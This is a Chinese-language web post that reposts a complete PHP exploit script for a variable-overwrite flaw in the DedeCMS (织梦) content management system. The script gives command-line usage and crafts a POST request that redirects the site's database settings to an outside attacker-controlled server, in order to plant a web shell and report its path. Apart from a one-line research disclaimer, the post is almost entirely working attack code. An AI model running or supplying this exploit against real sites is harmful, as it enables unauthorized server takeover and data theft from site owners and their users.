5D

5D

关注
发信
关注(28)粉丝(399)

DeDeCMS(织梦)变量覆盖0day getshell

测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. #!usr/bin/php -w
    2. <?php
    3. error_reporting(E_ERROR);
    4. set_time_limit(0);
    5. print_r('
    6. DEDEcms Variable Coverage
    7. Exploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url]
    8. );
    9. echo "\r\n";
    10. if($argv[2]==null){
    11. print_r('
    12. +---------------------------------------------------------------------------+
    13. Usage: php '.$argv[0].' url aid path
    14. aid=1 shellpath /data/cache aid=2 shellpath=/ aid=3 shellpath=/plus/
    15. Example:
    16. php '.$argv[0].'[url]www.site.com[/url] 1 old
    17. +---------------------------------------------------------------------------+
    18. ');
    19. exit;
    20. }
    21. $url=$argv[1];
    22. $aid=$argv[2];
    23. $path=$argv[3];
    24. $exp=Getshell($url,$aid,$path);
    25. if (strpos($exp,"OK")>12){
    26. echo "[*] Exploit Success \n";
    27. if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;
    28. if($aid==2)echo "[*]Shell:".$url."/$path/fuck.php\n" ;
    29. if($aid==3)echo "[*]Shell:".$url."/$path/plus/fuck.php\n";
    30. }else{
    31. echo "[*]ExploitFailed \n";
    32. }
    33. function Getshell($url,$aid,$path){
    34. $id=$aid;
    35. $host=$url;
    36. $port="80";
    37. $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    38. $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    39. $data .= "Host:".$host."\r\n";
    40. $data .= "User-Agent:Mozilla/5.0(Windows NT 5.2; rv:5.0.1)Gecko/20100101Firefox/5.0.1\r\n";
    41. $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    42. $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    43. //$data .= "Accept-Encoding: gzip,deflate\r\n";
    44. $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    45. $data .= "Connection: keep-alive\r\n";
    46. $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    47. $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    48. $data .= $content."\r\n";
    49. $ock=fsockopen($host,$port);
    50. if (!$ock) {
    51. echo "[*] No response from ".$host."\n";
    52. }
    53. fwrite($ock,$data);
    54. while (!feof($ock)) {
    55. $exp=fgets($ock, 1024);
    56. return $exp;
    57. }
    58. }
    59. ?>
    60. 摘自:http://sebug.net/vuldb/ssvid-20949
05-11 14:06
Powered by LMLPHP ©2024 5D 0.075050